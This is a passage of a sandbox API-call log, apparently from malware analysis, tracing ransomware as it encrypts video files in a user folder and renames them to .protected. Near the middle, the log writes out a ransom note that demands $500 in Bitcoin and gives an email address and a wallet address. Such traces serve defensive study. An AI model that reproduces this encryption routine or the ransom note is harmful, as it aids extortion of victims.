hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.891] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\4fj2qr6hfnqo.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.891] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv") returned 71 [0092.891] StrStrW (lpFirst="4Fj2qr6hfnqo.mkv", lpSrch=".txt") returned 0x0 [0092.891] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv") returned 71 [0092.891] StrStrW (lpFirst="4Fj2qr6hfnqo.mkv", lpSrch=".rar") returned 0x0 [0092.891] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv") returned 71 [0092.891] StrStrW (lpFirst="4Fj2qr6hfnqo.mkv", lpSrch=".zip") returned 0x0 [0092.891] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.892] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.892] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.892] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.892] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.892] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.892] CloseHandle (hObject=0xd8) returned 1 [0092.893] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv.protected") returned 81 [0092.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\4fj2qr6hfnqo.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\4fj2qr6hfnqo.mkv.protected")) returned 1 [0092.893] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.893] lstrcmpiW (lpString1="d6LQOdonjH8Fnr67m.mkv", lpString2="Windows") returned -1 [0092.893] lstrcmpiW (lpString1="d6LQOdonjH8Fnr67m.mkv", lpString2="Program Files") returned -1 [0092.893] lstrcmpiW (lpString1="d6LQOdonjH8Fnr67m.mkv", lpString2="Program Files (x86)") returned -1 [0092.893] lstrcmpiW (lpString1="d6LQOdonjH8Fnr67m.mkv", lpString2="$Recycle.bin") returned 1 [0092.893] lstrcmpiW (lpString1="d6LQOdonjH8Fnr67m.mkv", lpString2="System Volume Information") returned -1 [0092.893] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv") returned 76 [0092.893] StrStrIW (lpFirst="d6LQOdonjH8Fnr67m.mkv", lpSrch=".protected") returned 0x0 [0092.894] lstrcmpW (lpString1="d6LQOdonjH8Fnr67m.mkv", lpString2="RESTORE_FILES.txt") returned -1 [0092.894] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.894] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\d6lqodonjh8fnr67m.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.894] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv") returned 76 [0092.894] StrStrW (lpFirst="d6LQOdonjH8Fnr67m.mkv", lpSrch=".txt") returned 0x0 [0092.894] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv") returned 76 [0092.894] StrStrW (lpFirst="d6LQOdonjH8Fnr67m.mkv", lpSrch=".rar") returned 0x0 [0092.894] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv") returned 76 [0092.894] StrStrW (lpFirst="d6LQOdonjH8Fnr67m.mkv", lpSrch=".zip") returned 0x0 [0092.894] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.895] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.895] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.895] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.895] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.895] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.895] CloseHandle (hObject=0xd8) returned 1 [0092.895] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv.protected") returned 86 [0092.895] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\d6lqodonjh8fnr67m.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\d6lqodonjh8fnr67m.mkv.protected")) returned 1 [0092.896] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.896] lstrcmpiW (lpString1="NSm97COf--gBhaYyMeA.avi", lpString2="Windows") returned -1 [0092.896] lstrcmpiW (lpString1="NSm97COf--gBhaYyMeA.avi", lpString2="Program Files") returned -1 [0092.896] lstrcmpiW (lpString1="NSm97COf--gBhaYyMeA.avi", lpString2="Program Files (x86)") returned -1 [0092.896] lstrcmpiW (lpString1="NSm97COf--gBhaYyMeA.avi", lpString2="$Recycle.bin") returned 1 [0092.896] lstrcmpiW (lpString1="NSm97COf--gBhaYyMeA.avi", lpString2="System Volume Information") returned -1 [0092.896] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi") returned 78 [0092.896] StrStrIW (lpFirst="NSm97COf--gBhaYyMeA.avi", lpSrch=".protected") returned 0x0 [0092.896] lstrcmpW (lpString1="NSm97COf--gBhaYyMeA.avi", lpString2="RESTORE_FILES.txt") returned -1 [0092.896] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.896] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\nsm97cof--gbhayymea.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.896] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi") returned 78 [0092.896] StrStrW (lpFirst="NSm97COf--gBhaYyMeA.avi", lpSrch=".txt") returned 0x0 [0092.896] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi") returned 78 [0092.896] StrStrW (lpFirst="NSm97COf--gBhaYyMeA.avi", lpSrch=".rar") returned 0x0 [0092.896] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi") returned 78 [0092.896] StrStrW (lpFirst="NSm97COf--gBhaYyMeA.avi", lpSrch=".zip") returned 0x0 [0092.896] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.897] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.897] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.897] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.897] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.897] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.897] CloseHandle (hObject=0xd8) returned 1 [0092.897] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi.protected") returned 88 [0092.897] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\nsm97cof--gbhayymea.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\nsm97cof--gbhayymea.avi.protected")) returned 1 [0092.898] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.898] lstrcmpiW (lpString1="ofEIt.swf", lpString2="Windows") returned -1 [0092.898] lstrcmpiW (lpString1="ofEIt.swf", lpString2="Program Files") returned -1 [0092.898] lstrcmpiW (lpString1="ofEIt.swf", lpString2="Program Files (x86)") returned -1 [0092.898] lstrcmpiW (lpString1="ofEIt.swf", lpString2="$Recycle.bin") returned 1 [0092.898] lstrcmpiW (lpString1="ofEIt.swf", lpString2="System Volume Information") returned -1 [0092.898] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf") returned 64 [0092.898] StrStrIW (lpFirst="ofEIt.swf", lpSrch=".protected") returned 0x0 [0092.898] lstrcmpW (lpString1="ofEIt.swf", lpString2="RESTORE_FILES.txt") returned -1 [0092.898] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.898] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\ofeit.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.898] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf") returned 64 [0092.898] StrStrW (lpFirst="ofEIt.swf", lpSrch=".txt") returned 0x0 [0092.898] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf") returned 64 [0092.898] StrStrW (lpFirst="ofEIt.swf", lpSrch=".rar") returned 0x0 [0092.899] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf") returned 64 [0092.899] StrStrW (lpFirst="ofEIt.swf", lpSrch=".zip") returned 0x0 [0092.899] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x8d9, lpOverlapped=0x0) returned 1 [0092.899] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xfffff727, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.899] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x8d9, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x8d9, lpOverlapped=0x0) returned 1 [0092.899] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.899] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.899] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.900] CloseHandle (hObject=0xd8) returned 1 [0092.900] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf.protected") returned 74 [0092.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\ofeit.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\ofeit.swf.protected")) returned 1 [0092.900] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0092.900] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0092.901] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\RESTORE_FILES.txt") returned 72 [0092.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.901] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.901] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0092.902] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.902] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0092.902] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.902] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0092.902] CloseHandle (hObject=0xd4) returned 1 [0092.902] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.902] lstrcmpiW (lpString1="tyJtt8BR", lpString2="Windows") returned -1 [0092.902] lstrcmpiW (lpString1="tyJtt8BR", lpString2="Program Files") returned 1 [0092.902] lstrcmpiW (lpString1="tyJtt8BR", lpString2="Program Files (x86)") returned 1 [0092.902] lstrcmpiW (lpString1="tyJtt8BR", lpString2="$Recycle.bin") returned 1 [0092.902] lstrcmpiW (lpString1="tyJtt8BR", lpString2="System Volume Information") returned 1 [0092.902] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR") returned 57 [0092.902] lstrcmpW (lpString1="tyJtt8BR", lpString2=".") returned 1 [0092.902] lstrcmpW (lpString1="tyJtt8BR", lpString2="..") returned 1 [0092.902] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\*") returned 59 [0092.902] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0092.903] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.903] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.903] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.903] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.903] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.903] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\.") returned 59 [0092.903] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.903] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.903] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.903] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.903] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.903] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.903] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.903] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\..") returned 60 [0092.903] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.903] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.903] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.903] lstrcmpiW (lpString1="agm2SsPgMoj1u7.mp4", lpString2="Windows") returned -1 [0092.903] lstrcmpiW (lpString1="agm2SsPgMoj1u7.mp4", lpString2="Program Files") returned -1 [0092.903] lstrcmpiW (lpString1="agm2SsPgMoj1u7.mp4", lpString2="Program Files (x86)") returned -1 [0092.903] lstrcmpiW (lpString1="agm2SsPgMoj1u7.mp4", lpString2="$Recycle.bin") returned 1 [0092.903] lstrcmpiW (lpString1="agm2SsPgMoj1u7.mp4", lpString2="System Volume Information") returned -1 [0092.903] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4") returned 76 [0092.903] StrStrIW (lpFirst="agm2SsPgMoj1u7.mp4", lpSrch=".protected") returned 0x0 [0092.903] lstrcmpW (lpString1="agm2SsPgMoj1u7.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0092.903] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: 